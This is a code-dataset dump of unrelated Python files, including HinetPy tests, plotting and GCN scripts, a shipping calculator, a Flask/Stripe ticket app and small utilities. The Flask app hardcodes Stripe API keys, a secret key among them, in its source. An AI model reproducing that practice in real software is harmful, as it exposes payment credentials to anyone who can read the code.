batch_xs, ys: batch_ys, keep_prob: 0.5})\n if i % 50 == 0:\n print(compute_accuracy(\nmnist.test.images, mnist.test.labels))","sub_path":"tf_cnn.py","file_name":"tf_cnn.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"218637778","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport shutil\nfrom datetime import datetime, date\n\nimport pytest\nimport requests\n\nfrom HinetPy import Client\n\nusername = \"test_username\"\npassword = \"test_password\"\n\n\n# http://docs.pytest.org/en/latest/fixture.html\n#@pytest.fixture is better, but pytest prior 2.10 doesn't support\n@pytest.yield_fixture(scope=\"module\")\ndef client():\n client = Client(username, password)\n client.select_stations('0101', ['N.AAKH', 'N.ABNH'])\n yield client\n client.select_stations('0101')\n\n\nclass TestClientLoginClass:\n \"\"\"Login related tests\"\"\"\n def test_client_init_and_login_succeed(self):\n Client(username, password)\n\n def test_client_init_and_login_fail(self):\n \"\"\" Raise ConnectionError if requests fails. \"\"\"\n with pytest.raises(requests.ConnectionError):\n Client(\"anonymous\", \"anonymous\")\n\n def test_login_after_init(self):\n client = Client()\n client.login(username, password)\n\n\nclass TestClientCheckClass:\n def test_check_service_update(self, client):\n assert not client.check_service_update()\n\n def test_check_package_release(self, client):\n assert not client.check_package_release()\n\n def test_check_cmd_exists(self, client):\n assert client.check_cmd_exists()\n\n\nclass TestGetwaveformClass:\n def test_get_waveform_1(self, client):\n starttime = datetime(2010, 1, 1, 0, 0)\n data, ctable = client.get_waveform('0101', starttime, 9)\n\n assert data == '0101_201001010000_9.cnt'\n assert os.path.exists(data)\n os.remove(data)\n assert ctable == '0101_20100101.ch'\n assert os.path.exists(ctable)\n os.remove(ctable)\n\n def test_get_waveform_starttime_in_string(self, client):\n data, ctable = client.get_waveform('0101', '2010-01-01T00:00', 9)\n\n assert data == '0101_201001010000_9.cnt'\n assert os.path.exists(data)\n os.remove(data)\n assert ctable == '0101_20100101.ch'\n assert os.path.exists(ctable)\n os.remove(ctable)\n\n def test_get_waveform_custom_name_1(self, client):\n starttime = datetime(2010, 1, 1, 0, 0)\n data, ctable = client.get_waveform('0101', starttime, 1,\n data=\"customname1.cnt\",\n ctable=\"customname1.ch\")\n\n assert data == 'customname1.cnt'\n assert os.path.exists(data)\n os.remove(data)\n assert ctable == 'customname1.ch'\n assert os.path.exists(ctable)\n os.remove(ctable)\n\n def test_get_waveform_custom_name_2(self, client):\n starttime = datetime(2010, 1, 1, 0, 0)\n data, ctable = client.get_waveform('0101', starttime, 1,\n data=\"customname2/customname2.cnt\",\n ctable=\"customname2/customname2.ch\")\n\n assert data == 'customname2/customname2.cnt'\n assert os.path.exists(data)\n assert ctable == 'customname2/customname2.ch'\n assert os.path.exists(ctable)\n shutil.rmtree(\"customname2\")\n\n def test_get_waveform_custom_name_3(self, client):\n starttime = datetime(2010, 1, 1, 0, 0)\n data, ctable = client.get_waveform('0101', starttime, 1,\n outdir=\"customname3\")\n\n assert data == \"customname3/0101_201001010000_1.cnt\"\n assert os.path.exists(data)\n assert ctable == \"customname3/0101_20100101.ch\"\n assert os.path.exists(ctable)\n shutil.rmtree(\"customname3\")\n\n def test_get_waveform_custom_name_4(self, client):\n starttime = datetime(2010, 1, 1, 0, 0)\n data, ctable = client.get_waveform('0101', starttime, 1,\n data=\"customname4-cnt/test.cnt\",\n ctable=\"customname4-ch/test.ch\",\n outdir=\"customname4-data\")\n\n assert data == \"customname4-cnt/test.cnt\"\n assert os.path.exists(data)\n assert ctable == \"customname4-ch/test.ch\"\n assert os.path.exists(ctable)\n shutil.rmtree(\"customname4-cnt\")\n shutil.rmtree(\"customname4-ch\")\n\n\nclass TestGetwaveformSpanClass:\n def test_get_waveform_wrong_span_1(self, client):\n starttime = datetime(2005, 1, 1, 0, 0)\n with pytest.raises(ValueError):\n client.get_waveform('0101', starttime, 0)\n\n def test_get_waveform_wrong_span_2(self, client):\n starttime = datetime(2005, 1, 1, 0, 0)\n with pytest.raises(ValueError):\n client.get_waveform('0101', starttime, -4)\n\n def test_get_waveform_wrong_span_3(self, client):\n starttime = datetime(2005, 1, 1, 0, 0)\n with pytest.raises(TypeError):\n client.get_waveform('0101', starttime, 2.5)\n\n def test_get_waveform_span_larger_than_int(self, client):\n starttime = datetime(2005, 1, 1, 0, 0)\n with pytest.raises(ValueError):\n client.get_waveform('0101', starttime, 400000)\n\n def test_get_waveform_larger_max_span(self, client):\n starttime = datetime(2010, 1, 1, 0, 0)\n data, ctable = client.get_waveform('0101', starttime, 10, max_span=65)\n assert data == '0101_201001010000_10.cnt'\n assert os.path.exists(data)\n os.remove(data)\n assert ctable == '0101_20100101.ch'\n assert os.path.exists(ctable)\n os.remove(ctable)\n\n def test_get_waveform_wrong_starttime(self, client):\n starttime = datetime(2001, 1, 1, 0, 0)\n with pytest.raises(ValueError):\n client.get_waveform('0101', starttime, 1)\n\n\nclass TestGetCatalogClass:\n def test_get_arrivaltime_1(self, client):\n startdate = date(2010, 1, 1)\n data = client.get_arrivaltime(startdate, 5)\n assert data == 'measure_20100101_5.txt'\n assert os.path.exists(data)\n os.remove(data)\n\n def test_get_arrivaltime_2(self, client):\n startdate = date(2010, 1, 1)\n data = client.get_arrivaltime(startdate, 5, filename=\"arrivaltime.txt\")\n assert data == \"arrivaltime.txt\"\n assert os.path.exists(data)\n os.remove(data)\n\n def test_get_arrivaltime_use_datetime(self, client):\n startdate = datetime(2010, 1, 1)\n data = client.get_arrivaltime(startdate, 5)\n assert data == 'measure_20100101_5.txt'\n assert os.path.exists(data)\n os.remove(data)\n\n def test_get_arrivaltime_startdate_in_string(self, client):\n data = client.get_arrivaltime('20100101', 5)\n assert data == 'measure_20100101_5.txt'\n assert os.path.exists(data)\n os.remove(data)\n\n def test_get_focalmechanism_1(self, client):\n startdate = date(2010, 1, 1)\n data = client.get_focalmechanism(startdate, 5)\n assert data == 'focal_20100101_5.txt'\n assert os.path.exists(data)\n os.remove(data)\n\n def test_get_focalmachanism_2(self, client):\n startdate = date(2010, 1, 1)\n data = client.get_focalmechanism(startdate, 5, filename=\"focal.txt\")\n assert data == \"focal.txt\"\n assert os.path.exists(data)\n os.remove(data)\n\n def test_get_focalmachanism_use_datetime(self, client):\n startdate = datetime(2010, 1, 1)\n data = client.get_focalmechanism(startdate, 5, filename=\"focal.txt\")\n assert data == \"focal.txt\"\n assert os.path.exists(data)\n os.remove(data)\n\n def test_get_catalog_wrong_span(self, client):\n startdate = date(2010, 1, 1)\n with pytest.raises(ValueError):\n data = client.get_arrivaltime(startdate, 10)\n\n\n\nclass TestClientOthersClass:\n\n def test_get_allowed_span(self, client):\n assert client._get_allowed_span('0401') == 60\n client.select_stations('0101')\n assert client._get_allowed_span('0101') == 5\n client.select_stations('0101', ['N.AAKH', 'N.ABNH'])\n assert client._get_allowed_span('0101') == 60\n\n def test_get_selected_stations(self, client):\n client.get_selected_stations('0101')\n client.get_selected_stations('0103')\n with pytest.raises(ValueError):\n client.get_selected_stations('0501')\n\n","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":8222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"649396929","text":"import os\n\n\ndef test_dotfiles(host):\n homedir = os.environ[\"HOME\"] + \"/\"\n files = [\".tigrc\",\n \".tmux.conf\",\n \".vimrc\",\n \".zshrc\",\n \".hammerspoon/init.lua\"]\n for file in files:\n dotfile = host.file(homedir + file)\n assert dotfile.is_file\n","sub_path":"roles/dotfiles/tests/test_dotfile.py","file_name":"test_dotfile.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"468961205","text":"import pandas as pd\n\nfrom fastsemsim.SemSim import *\n\nimport matplotlib.pyplot as plt\n\nfrom rpy2.robjects import pandas2ri\npandas2ri.activate()\nfrom mpl_toolkits.mplot3d import Axes3D\nimport constants\n\nfrom scipy.cluster import hierarchy\nimport scipy.cluster.hierarchy as hcl\nfrom scipy.spatial.distance import squareform\n\n\nimport utils.go\nimport utils.go_hierarcies\nimport math\nimport random\nimport matplotlib.cm as cm\n\nfrom matplotlib.lines import Line2D\nimport matplotlib.colors as ml_colors\n\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable, axes_size\n\nENABLE_GO_GRAPH = False\nIS_GO_GRAPH_ONLY=False\nGO_PCA=False\nTERMS_SIMILARITY_TO_NUM_OF_TERMS=True\nRATIO_TO_GO_TERM = True\nQVAL_TH = 0.01\nSIM_TH= 0.4\n\nimport seaborn as sns\n\n\ndef plot_grid(path_format, datasets, algos):\n\n for dataset in datasets:\n df_grid=pd.DataFrame()\n for algo in algos:\n\n path=path_format.format(dataset=dataset, algo=algo)\n df_terms=pd.read_csv(path, sep='\\t')\n # df_terms = df_terms[df_terms[\"emp_pval\"]==0]\n df_terms = df_terms.iloc[:5,:]\n\n for cur_i, cur_row in df_terms.iterrows():\n df_grid=df_grid.append({\"algo\": algo, 'go_name': cur_row['GO name'], 'hg_pval': cur_row['hg_pval']}, ignore_index=True)\n\n go_list = np.unique(df_grid[[\"go_name\"]])\n fig, ax = plt.subplots(figsize=(40, 40))\n ax.set_facecolor('#fffde3')\n ax.grid(color='gray')\n\n xs=[algos.index(a) for a in df_grid[\"algo\"]]\n ys=[list(go_list).index(a) for a in df_grid[\"go_name\"]]\n cs=[a for a in df_grid[\"hg_pval\"]]\n sc = ax.scatter(xs, ys, 300, c=cs, cmap='bwr', vmin=np.percentile(cs, 10),\n vmax=np.percentile(cs, 90))\n for x, y ,c in zip(xs, ys, cs):\n ax.annotate( \"{}\".format(round(c,2)), (x, y), color='green', size=20)\n ax.legend(loc='upper left')\n ax.margins(0.03, 0.03)\n\n ax.set_xlabel(\"algos\", fontdict={\"size\" : 35})\n plt.subplots_adjust(left=0.25, right=0.99, top=0.99, bottom=0.05)\n plt.xticks(np.arange(len(algos)), tuple(algos), rotation='vertical', size=35)\n ax.set_ylabel(\"algos\", fontdict={\"size\" : 25})\n plt.yticks(np.arange(len(go_list)), tuple(go_list), size=35)\n ax_ = plt.gca()\n aspect = 20\n pad_fraction = 0.5\n divider = make_axes_locatable(ax_)\n width = axes_size.AxesY(ax_, aspect=1. / aspect)\n pad = axes_size.Fraction(pad_fraction, width)\n cax = divider.append_axes(\"right\", size=0.3, pad=0.4)\n plt.colorbar(mappable=sc, cax=cax)\n cax.tick_params(labelsize=35)\n plt.tight_layout()\n plt.savefig(os.path.join(constants.OUTPUT_GLOBAL_DIR, \"grid_go_terms_{}.png\".format(dataset)))\n plt.clf()\n\n\ndef main():\n datasets=[\"TNFa_2\", \"HC12\", \"SHERA\", \"ROR_1\", \"SHEZH_1\", \"ERS_1\", \"IEM\"]\n algos = [\"jactivemodules_greedy\",\"jactivemodules_sa\",\"netbox\",\"hotnet2\",\"bionet\",\"keypathwayminer_INES_GREEDY\"]\n path_format = \"/home/hag007/Desktop/aggregate_report/oob/emp_diff_{dataset}_{algo}_passed_oob.tsv\"\n\n plot_grid(path_format, datasets, algos)\n\n\nif __name__==\"__main__\":\n main()","sub_path":"plots/old/grid_plot_go_terms.py","file_name":"grid_plot_go_terms.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"570148436","text":"# Socket port and baudrate are also used as systemID\nBEACON_PORT = 7582\nSENSORS_PORT = 7586\n\nsystem_list = {\n 'Beacon':{\n 'id': BEACON_PORT,\n 'port': BEACON_PORT,\n 'tags': [444, 14954135790684542069]\n },\n 'Sensors':{\n 'id': SENSORS_PORT,\n 'port': SENSORS_PORT,\n 'tags': [0]\n },\n}\n\ndata_fields = [\n \"timestamp\", # time in milliseconds in epoch time\n # the device we want to locate (previously named tag_id)\n \"device_id\",\n # we use the UDP port as system id (for now at least, but we must change it to locate several device at a time)\n \"system_id\",\n # anchor used to take the current measure (previously named locator_id)\n \"anchor_id\",\n # [theta_x, theta_y, theta_z] corresponds to the orientation of the device (radian)\n \"theta_x\",\n \"theta_y\",\n \"theta_z\",\n \"txpower\", # transmitting power of the anchor\n \"rssi\", # signal strength received by the device\n # [acc_x, acc_y, acc_z] corresponds to the local acceleration vector of the device\n \"acc_x\",\n \"acc_y\",\n \"acc_z\",\n \"is_step_detected\" # step detected by imu\n]\n\n# These are the index of the values when we write them\ndata_timestamp = data_fields.index(\"timestamp\")\ndata_device_id = data_fields.index(\"device_id\")\ndata_system_id = data_fields.index(\"system_id\")\ndata_anchor_id = data_fields.index(\"anchor_id\")\ndata_txpower = data_fields.index(\"txpower\")\ndata_rssi = data_fields.index(\"rssi\")\ndata_theta_x = data_fields.index(\"theta_x\")\ndata_theta_y = data_fields.index(\"theta_y\")\ndata_theta_z = data_fields.index(\"theta_z\")\ndata_acc_x = data_fields.index(\"acc_x\")\ndata_acc_y = data_fields.index(\"acc_y\")\ndata_acc_z = data_fields.index(\"acc_z\")\n\n\ndef data_dict2list(dic):\n return [dic[f] if f in list(dic.keys()) else 'NaN' for f in data_fields]\n\n\ndef data_list2dict(array):\n dic = {}\n for k in range(len(array)):\n val = array[k]\n if val is not None and not val == 'NaN':\n field = data_fields[k]\n dic[field] = val\n return dic\n\n\nimu_raw_fields = [\n \"timestamp\",\n \"device_id\",\n \"system_id\",\n \"accelerometer_x\",\n \"accelerometer_y\",\n \"accelerometer_z\",\n \"magnetic_field_x\",\n \"magnetic_field_y\",\n \"magnetic_field_z\",\n \"gravity_x\",\n \"gravity_y\",\n \"gravity_z\",\n \"linear_acceleration_x\",\n \"linear_acceleration_y\",\n \"linear_acceleration_z\",\n \"gyroscope_x\",\n \"gyroscope_y\",\n \"gyroscope_z\",\n \"orientation_qx\",\n \"orientation_qy\",\n \"orientation_qz\",\n \"orientation_qw\",\n \"orientation_gravaccgyro_qx\",\n \"orientation_gravaccgyro_qy\",\n \"orientation_gravaccgyro_qz\",\n \"orientation_gravaccgyro_qw\",\n \"orientation_accgyro_qx\",\n \"orientation_accgyro_qy\",\n \"orientation_accgyro_qz\",\n \"orientation_accgyro_qw\",\n \"is_step_detected_sensor\",\n \"is_step_detected\"\n]\n\n\ndef imu_raw_dict2list(dic):\n return [dic[f] if f in list(dic.keys()) else 'NaN' for f in imu_raw_fields]\n","sub_path":"Acquisition/ubiment_parameters.py","file_name":"ubiment_parameters.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"636336445","text":"'''\n This program calculates the shipping rates for one or more packages, based on the\n rates below.\n Created by Caleb Gibney (2015-6-8)\n\n Weight of package Rate per Pound\n ----------------- --------------\n 3 pounds or less $2.20\n over 3 pounds but not more than 5 pounds $3.10\n over 5 pounds but not more than 8 pounds $3.70\n over 8 pounds $4.50 \n'''\nRATE1 = 2.2\nRATE2 = 3.1\nRATE3 = 3.7\nRATE4 = 4.5\n\n# Defining main function\ndef main():\n \n # Control variable for while loop\n keep_going = \"Y\"\n\n # Main while loop for program. Used so the end user can easily restart the program\n while keep_going == \"Y\" or keep_going == \"y\":\n \n print(\"Welcome to the (insert company name here) Calculator \" + \\\n \"for Shipping Charges \\n\")\n\n # Getting number of packages from user and assigning it to variable 'packages'\n packages = int(input(\"Enter number of packages to calculate: \"))\n\n # Error trap for incorrect number of packages. Loop will stay true until\n # the user inputs correct data.\n while packages < 1:\n print(\"Number of packages must not be less than 1\")\n packages = int(input(\"Enter number of packages to calculate: \"))\n\n # Creating accumulator variable to calculate total cost of shipping\n total = 0\n\n # For loop to calculate one or more package shipping rates.\n # 2 arguments for the range function. Starting value is 1 and\n # the value of packages is incremented by 1 for better readability by the user.\n for counter in range(1,packages+1):\n print(\"\\nEnter weight of package #\", counter, \": \", sep='', end='')\n weight = float(input())\n\n # Error trap for bad weight. Will stay true until user puts in proper weight\n while weight <= 0:\n print(\"Weight must not be less than or equal to 0 lbs\")\n print(\"\\nEnter weight of package #\", counter, \": \", sep='', end='')\n weight = float(input())\n\n # Decision structures for variable rate (dependent on weight of package) \n if weight <= 3:\n rate = 2.20\n elif weight <= 5:\n rate = 3.10\n elif weight <= 8:\n rate = 3.70\n else:\n rate = 4.50\n cost = weight * rate\n\n # Accumulating costs to the total variable for every loop, so that the \n # total can be calculated \n total += cost\n\n # Printing information to the user for every package calculated\n print(\"\\nPackage #\", counter, \": Weight: \", format(weight, ','), \\\n \" lbs. Rate: $\", format(rate, '.2f'), \\\n \" per lb. Shipping charge: $\", format(cost, ',.2f'), sep='')\n\n # Printing total for the user \n print(\"\\nTotal shipping charge: $\", format(total, ',.2f'), sep='')\n # Prompting the user to quit or continue, and assigning that value to\n # the keep_going variable\n keep_going = input(\"\\nDo you wish to calculate more rates? Enter 'Y' \" + \\\n \"to continue or 'N' to quit: \")\n# Calling main function to start the program\nmain()\n","sub_path":"CalebGibneyUnit2.py","file_name":"CalebGibneyUnit2.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"49323754","text":"from __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport time\r\nimport tensorflow as tf\r\nfrom itertools import product\r\nfrom gcn.utils import *\r\nfrom gcn.models import GCN, MLP\r\nimport sys \r\nimport ast \r\nfrom shutil import copyfile\r\n\r\n# Set random seed\r\nseed = 123\r\nnp.random.seed(seed)\r\ntf.set_random_seed(seed)\r\n\r\n\r\nbest_model_path = sys.argv[1]\r\n\r\nconfigs = pkl_load(best_model_path+'/configs_dict.pkl')\r\n\r\n# Load data\r\nadj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask = load_data(configs['dataset'])\r\n\r\n# Some preprocessing\r\nfeatures = preprocess_features(features)\r\nif configs['model'] == 'gcn':\r\n support = [preprocess_adj(adj)]\r\n num_supports = 1\r\n model_func = GCN\r\nelif configs['model'] == 'gcn_cheby':\r\n support = chebyshev_polynomials(adj, configs['max_degree'])\r\n num_supports = 1 + configs[max_degree]\r\n model_func = GCN\r\nelif configs['model'] == 'dense':\r\n support = [preprocess_adj(adj)] # Not used\r\n num_supports = 1\r\n model_func = MLP\r\nelse:\r\n raise ValueError('Invalid argument for model: ' + str(configs['model']))\r\n\r\nconfigs['num_indices'] = support[0][0].shape[0]\r\nconfigs['num_nodes'] = support[0][2][0]\r\n\r\nif configs.get('propagate_labels',False):\r\n if configs.get('learnable_label_propagation',False):\r\n configs['label_aggregator_matrix'] = indices_to_aggregator(sparse_to_tuple(adj)[0])\r\n else:\r\n configs['label_aggregator_matrix'] = sparse_to_tuple(row_normalize_sparse_matrix(adj))\r\n\r\n# Define placeholders\r\nplaceholders = {\r\n 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)],\r\n 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)),\r\n 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])),\r\n 'labels_mask': tf.placeholder(tf.int32),\r\n 'dropout': tf.placeholder_with_default(0., shape=()),\r\n 'num_features_nonzero': tf.placeholder(tf.int32) # helper variable for sparse dropout\r\n}\r\n\r\n# Create model\r\nmodel = model_func(placeholders, configs, input_dim=features[2][1], logging=True)\r\n\r\n# Initialize session\r\nsess = tf.Session()\r\n\r\n\r\n# Define model evaluation function\r\ndef evaluate(features, support, labels, mask, placeholders):\r\n t_test = time.time()\r\n feed_dict_val = construct_feed_dict(features, support, labels, mask, placeholders)\r\n outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val)\r\n return outs_val[0], outs_val[1], (time.time() - t_test)\r\n\r\n\r\n# Init variables\r\nsess.run(tf.global_variables_initializer())\r\n\r\ncost_val = []\r\nbest_val = 0.0\r\n\r\n# Train model\r\nfor epoch in range(configs['epochs']):\r\n\r\n t = time.time()\r\n # Construct feed dictionary\r\n feed_dict = construct_feed_dict(features, support, y_train, train_mask, placeholders)\r\n feed_dict.update({placeholders['dropout']: configs['dropout']})\r\n\r\n # Training step\r\n outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict)\r\n\r\n # Validation\r\n cost, acc, duration = evaluate(features, support, y_val, val_mask, placeholders)\r\n cost_val.append(cost)\r\n\r\n # Print results\r\n print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]),\r\n \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost),\r\n \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t))\r\n\r\n if acc > best_val:\r\n best_val = acc \r\n model.save(best_model_path+'/best_model', sess)\r\n\r\n if epoch > configs['early_stopping'] and cost_val[-1] > np.mean(cost_val[-(configs['early_stopping']+1):-1]):\r\n print(\"Early stopping...\")\r\n break\r\n\r\nprint(\"Optimization Finished!\")\r\n\r\n# Testing\r\ntf.reset_default_graph()\r\nmodel.load(best_model_path + '/best_model', sess)\r\n\r\ntest_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, placeholders)\r\nprint(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost),\r\n \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration))\r\n","sub_path":"gcn/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"150291857","text":"from flask import Flask, render_template, request, redirect, url_for, session\nfrom backend.ticket_manager import TicketClass\nfrom backend.simplegmail_wrapper import GreetingEmail\n\nimport stripe\n\napp = Flask(__name__)\n\n# Adding STRIPE tokens to the app configuration\napp.config['STRIPE_PUBLIC_KEY'] = 'pk_test_1CPqKqHEMYPL3pep8bzUadZQ'\napp.config['STRIPE_SECRET_KEY'] = 'sk_test_2dqyTdYE3bmQbslK8JQg3X9D'\n\n# Setting up the STRIPE API key\nstripe.api_key = app.config['STRIPE_SECRET_KEY']\n\n# Route for the ticket purchasing page\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n # Getting the number of tickets remaining to be sold\n tickets_remaining = TicketClass.MAX_LIMIT_TICKETS - TicketClass.getNumSoldTickets()\n\n # Returning an error message if all the tickets have been sold\n if (tickets_remaining == 0):\n return render_template('/tickets/buy-tickets.html', error=\"NoTickets\", tickets_remaining=tickets_remaining)\n\n session = stripe.checkout.Session.create(\n payment_method_types=['card'],\n line_items=[{\n 'price': 'price_1Ixv2UDTPk3QaJIM1e6YzLrw',\n 'quantity': 1,\n }],\n mode='payment',\n success_url=url_for('success', _external=True) + '?session_id={CHECKOUT_SESSION_ID}',\n cancel_url=url_for('index', _external=True) + '?error=Fail',\n )\n\n return render_template('/tickets/buy-tickets.html',\n checkout_session_id=session['id'],\n checkout_public_key=app.config['STRIPE_PUBLIC_KEY'],\n tickets_remaining=tickets_remaining\n )\n\n@app.route('/success', methods=['GET'])\ndef success():\n # Purchase was successful\n session_info = stripe.checkout.Session.retrieve(request.args.get('session_id'))\n customer = stripe.Customer.retrieve(session_info.customer)\n\n # Parsing the customer's information\n fullname = customer.name\n customer_email = customer.email\n \n if (len(fullname.split(\" \")) > 1):\n forename, surname = fullname.split(\" \")[0], fullname.split(\" \")[1]\n else:\n forename, surname = fullname, \"\"\n\n # Checking to see if the user has refreshed the page\n if (request.args.get('session_id') == TicketClass.LAST_SESSION_ID):\n return render_template('/tickets/success.html', name=\"\", qr_code=\"\", refresh=True)\n\n # Creating a new QR code for the user's ticket\n qr_code = TicketClass.createQRCode(\"127.0.0.1:5000/verify?id=\", (forename, surname))\n # Setting the last session id to the current id\n TicketClass.LAST_SESSION_ID = request.args.get('session_id')\n\n # Creating a confirmation email containing the customer's ticket\n email = GreetingEmail(forename, surname, customer_email, qr_code[len(\"data:image/png;base64,\")-1:])\n # Sending the confirmation email\n email.send()\n \n return render_template('/tickets/success.html', name=fullname, qr_code=qr_code)\n\n@app.route('/verify')\ndef verification_page():\n # Verifying the identity of the ticket\n allow, name = TicketClass.verify_ticket(request.args.get('id'))\n\n if (allow):\n fullname = name[0] + \" \" + name[1]\n # Updating the ticket to be 'checked-in'\n TicketClass.setCheckedIn(request.args.get('id'))\n return render_template('/verify/verification.html', name=fullname)\n\n return render_template('/verify/verification.html', name=\"Fail\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"246125380","text":"import numpy as np\n\nfrom abraxus.population import Individual, Population, SeedChromosome\n\n\ndef test_create_seed_chromosome():\n ch = SeedChromosome()\n value = ch.value()\n assert value != ch.mutate()\n\n\ndef test_create_individual():\n ind = Individual([SeedChromosome])\n assert ind.chromosomes.get(\"seed\")\n assert not ind.chromosomes.get(\"evaluate\")\n assert isinstance(ind.chromosomes[\"seed\"], SeedChromosome)\n\n\ndef test_create_population():\n population = Population(max_size=100, mutation=0.5, cross=0.4)\n assert population._max_size == 100\n assert population._mutation == 0.5\n assert population._cross == 0.4\n\n\ndef test_init_population():\n population = Population(max_size=100, mutation=0.5, cross=0.4)\n population.initial([SeedChromosome])\n assert len(population.pool) == 20\n assert isinstance(population.pool[0], Individual)\n for ind in population.pool:\n print(ind.dna)\n\n\ndef objective_func(individual: Individual):\n \"\"\"\n Целевая функция для работы генетического алгоритма.\n Должна получать параметры из \"особи\" проводить вычисления\n и возвращать значение ошибки\n :param individual:\n :return:\n \"\"\"\n seed = individual.seed\n np.random.seed(seed)\n array = []\n for i in range(15):\n array.append(np.random.uniform(0, 1))\n result = sum(array)\n error = (1 - result) ** 2\n return error\n\n\ndef test_calculate_population():\n population = Population(max_size=100, mutation=0.5, cross=0.4)\n population.initial([SeedChromosome])\n population.calculate(objective_func)\n assert len(population.errors_generation) == 20\n for i, error in enumerate(population.errors_generation):\n print(i, error)\n\n\ndef test_evaluate_population():\n population = Population(max_size=100, mutation=0.5, cross=0.4)\n population.initial([SeedChromosome])\n population.calculate(objective_func)\n population.evaluate()\n assert len(population.errors_generation) == 20\n e = 0\n for i, error in enumerate(population.errors_generation):\n assert error[1] >= e\n e = error[1]\n print(i, error)\n\n\ndef test_cross_population():\n population = Population(max_size=100, mutation=0.5, cross=0.4)\n population.initial([SeedChromosome])\n population.calculate(objective_func)\n population.evaluate()\n population.cross()\n\n assert len(population.errors_generation) == 20\n e = 0\n for i, error in enumerate(population.errors_generation):\n assert error[1] >= e\n e = error[1]\n print(i, error)\n","sub_path":"abraxus/tests/test_population.py","file_name":"test_population.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"298523510","text":"import re\n\n# I или ignorecase — поиск без учета регистра:\n\np = re.compile(r\"^[а-яе]+$\", re.U) \nprint(\"Найдено\" if p.search(\"абв\") else \"Нет\") # Поиск по регистру\n\np = re.compile(r\"^[а-яе]+$\", re.I | re.U) \nprint(\"Найдено\" if p.search(\"АБагд\") else \"Нет\") # Поиск по регистру\n\n# Символ ^ соответствует привязке к началу каждой подстроки;\n# Cимвол $ — позициия перед символом перевода строки;\n\nc = re.compile(r\"\"\"^# Привязка к началу строки\n[0-9]+ #Строка должна содержать одну цифру (или более)\n$ # Привязка к концу строки \n\"\"\", re.X| re.S)\nprint(\"Найдено\" if c.search(\"124245021\") else \"Нет\") # Найдено\n\n","sub_path":"test22.py","file_name":"test22.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"431743299","text":"#!/usr/bin/env python3\n\nnums = list(map(int, input().split()))\n\ndef count(n):\n n_childs = nums[n]\n n_metadata = nums[n+1]\n pos = n+2\n res = 0\n for _ in range(n_childs):\n r, pos = count(pos)\n res += r \n for _ in range(n_metadata):\n res += nums[pos]\n pos += 1\n return res, pos\n\nprint(count(0)[0])","sub_path":"8/solution-A.py","file_name":"solution-A.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"266533343","text":"from pprint import pprint, pformat\n\n\nclass Field:\n def __init__(self, n, m):\n self.n, self.m = n, m\n\n if (type(n) is not int) or (type(m) is not int):\n raise Exception('Wrong type of field sizes: {} and {}'.format(type(n), type(m)))\n\n if n <= 0 or m <= 0:\n raise Exception('Wrong field size: {}x{}'.format(n, m))\n\n self.field = [[False for x in range(0, m)] for y in range(0, n)]\n\n def inside_field(self, x, y):\n return (x in range(0, self.n)) and (y in range(0, self.m))\n\n def set_cell(self, x, y, is_alive):\n if not self.inside_field(x, y):\n raise Exception('Cell {}x{} is outside the field of size {}x{}'.format(x, y, self.n, self.m))\n\n if is_alive not in [True, False]:\n raise Exception('is_alive should be True or False but it is {}'.format(is_alive))\n\n self.field[x][y] = is_alive\n\n def get_cell(self, x, y):\n if not self.inside_field(x, y):\n return False\n return self.field[x][y]\n\n\nif __name__ == '__main__':\n pass","sub_path":"life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"278119529","text":"# Time Lapse Photography\n# Ryan Heitz\n# Take a photo at a set interval\n\nimport time\nimport picamera\n\nwith picamera.PiCamera() as camera:\n camera.start_preview()\n time.sleep(2)\n # Start taking pictures repeatedly\n for filename in camera.capture_continuous('image{counter:04d}.jpg'):\n print('Captured %s' % filename)\n # wait 3 minutes\n time.sleep(180) 